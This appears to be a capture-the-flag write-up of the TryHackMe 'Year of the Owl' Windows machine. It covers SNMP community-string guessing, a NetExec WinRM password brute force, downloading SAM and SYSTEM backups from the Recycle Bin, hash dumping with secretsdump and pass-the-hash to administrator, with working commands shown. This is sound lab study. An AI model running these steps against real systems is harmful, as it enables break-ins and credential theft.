Year of the Owl

#tryhackme #windows #hard ![[Pasted image 20250708000101.png]] --- # Information Gathering - Nmap As always I began with scanning all 65,535 TCP ports and found 5 open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 21:56 CDT Nmap scan report for 10.10.235.117 Host is up (0.14s latency). Not shown: 65527 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3306/tcp open mysql 3389/tcp open ms-wbt-server 5985/tcp open wsman 47001/tcp open winrm Nmap done: 1 IP address (1 host up) scanned in 44.09 seconds ``` Then I ran a more detailed TCP port scan against those 5 open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV $IP -p 80,139,443,445,3306,3389,5985,47001 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 21:58 CDT Nmap scan report for 10.10.235.117 Host is up (0.14s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10) |_http-title: Year of the Owl |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10) | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10 |_http-title: Year of the Owl 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=year-of-the-owl | Not valid before: 2025-07-07T02:53:34 |_Not valid after: 2026-01-06T02:53:34 |_ssl-date: 2025-07-08T02:59:21+00:00; -2s from scanner time. | rdp-ntlm-info: | Target_Name: YEAR-OF-THE-OWL | NetBIOS_Domain_Name: YEAR-OF-THE-OWL | NetBIOS_Computer_Name: YEAR-OF-THE-OWL | DNS_Domain_Name: year-of-the-owl | DNS_Computer_Name: year-of-the-owl | Product_Version: 10.0.17763 |_ System_Time: 2025-07-08T02:58:43+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-07-08T02:58:47 |_ start_date: N/A |_clock-skew: mean: -1s, deviation: 0s, median: -1s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.31 seconds ``` UDP port scan revealed none. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 22:00 CDT Nmap scan report for 10.10.235.117 Host is up (0.13s latency). All 1000 scanned ports on 10.10.235.117 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds ``` --- # Footprinting ##### PORT 445 - SMB Tried `null authentication` with `smbclient` to see if we can enumerate SMB server without any credentials but failed. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ smbclient -N -L //$IP session setup failed: NT_STATUS_ACCESS_DENIED ``` ##### PORT 80 - HTTP The landing page of port 80 displays an image of an owl. ![[Pasted image 20250707220140.png]] At this point, I tried `gobuster` and other dirbuster tools to enumerate directories and pages but couldn't find any leads from here. That's when I tried scanning against UDP ports one more time. Oddly enough, scanning the top 1,000 UDP ports revealed no open ports, but scaning just the top 10 showed all 10 as `open|filtered`. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 22:17 CDT Nmap scan report for 10.10.235.117 Host is up (0.14s latency). All 1000 scanned ports on 10.10.235.117 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 22:17 CDT Nmap scan report for 10.10.235.117 Host is up (0.15s latency). PORT STATE SERVICE 53/udp open|filtered domain 67/udp open|filtered dhcps 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds ``` ##### Port 161 - SNMP Looking at the Nmap results, we see a non default port that stands out which is `SNMP`. I tried enumerate the version information using Nmap `-sCV` options but it failed. That's okay. I used `onesixtyone` I was able to enumerate SNMP community string `[openview]` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $IP Scanning 1 hosts, 3219 communities 10.10.235.117 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free) ``` Once I got the SNMP community string `openview`, I then ran this with `snmp-check` to dump all available SNMP information. ![[Pasted image 20250707223858.png]] Looking through the results, under the `User accounts`, we find a username that stands out because it's not a default username. ![[Pasted image 20250707224236.png]] # Exploit - Initial Access ##### Port 5985 - WinRM We have a username to mess with and open port 5985, we can try brute-force the user `Jareth` against the service using `NetExec` ```bash nxc winrm $IP -u Jareth -p /usr/share/wordlists/rockyou.txt | grep 'Pwn3d' ``` NetExec found the password for user `Jareth`! ![[Pasted image 20250707230217.png]] Since we got a valid set of credentials, let's login to WinRM via `evil-winrm`...And I successfully logged in :) ![[Pasted image 20250707230433.png]] Found `user.txt` in `C:\Users\Jareth\Desktop` ![[Pasted image 20250707230616.png]] # Privilege Escalation I am going to use `winPEAS` to enumerate attack vectors for privilege escalation. First, I downloaded `winPEAS` from my local Kali to remote Windows system. ![[Pasted image 20250707231433.png]] At this point, I was stuck for a very long time. I tried `winPEAS` but I couldn't enumerate any attack vectors. I tried manual methods one by one. Then I thought to look inside the recycle bin and there were `sam` and `system` backup files inside the bin... ```powershell *Evil-WinRM* PS C:\Users\Jareth\Documents> whoami /user USER INFORMATION ---------------- User Name SID ====================== ============================================= year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001 ``` ```powershell *Evil-WinRM* PS C:\Users\Jareth\Documents> dir 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001' Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/18/2020 7:28 PM 49152 sam.bak -a---- 9/18/2020 7:28 PM 17457152 system.bak ``` In order to download these files to my local Kali machine, I first need to move them out of the Recycle bin. ```powershell *Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> move sam.bak C:\Users\Jareth\Documents\sam.bak *Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> move system.bak C:\Users\Jareth\Documents\system.bak ``` Then download using `Evil-WinRM`'s built-in `download` command ```powershell Directory: C:\Users\Jareth\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/18/2020 7:28 PM 49152 sam.bak -a---- 9/18/2020 7:28 PM 17457152 system.bak *Evil-WinRM* PS C:\Users\Jareth\Documents> download sam.bak *Evil-WinRM* PS C:\Users\Jareth\Documents> download system.bak ``` From here we can extract hashes of stored user information using `Impacket-sercretsdump.py` ![[Pasted image 20250707234321.png]] We can try cracking the NTLM hashes but we can carry out `Pass-the-Hash` attack; just pass the hash as a parameter of `evil-winrm`. Successfully logged in as `administrator`. ![[Pasted image 20250707235911.png]] Found `admin.txt` ![[Pasted image 20250708000008.png]]